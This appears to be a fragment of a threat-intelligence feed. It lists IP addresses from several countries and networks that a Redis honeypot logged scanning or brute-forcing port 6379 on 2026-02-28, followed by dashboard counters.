| IPv4 | 39.106.12.108 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 85.239.245.254 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=40021; asn_org=Contabo Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 170.84.23.31 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=264990; asn_org=WT INFORMATICA TELECOMUNICACOES LTDA - ME; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 130.107.158.17 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 194.58.114.139 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=197695; asn_org=Domain names registrar REG.RU, Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 159.75.20.50 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 5.129.221.207 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=RU; asn=9123; asn_org=Jsc timeweb; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 91.230.168.6 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-28 |
0
Total STIX indicator objects.
Signal strength
0
CONFIG SET dir attacks trending this month.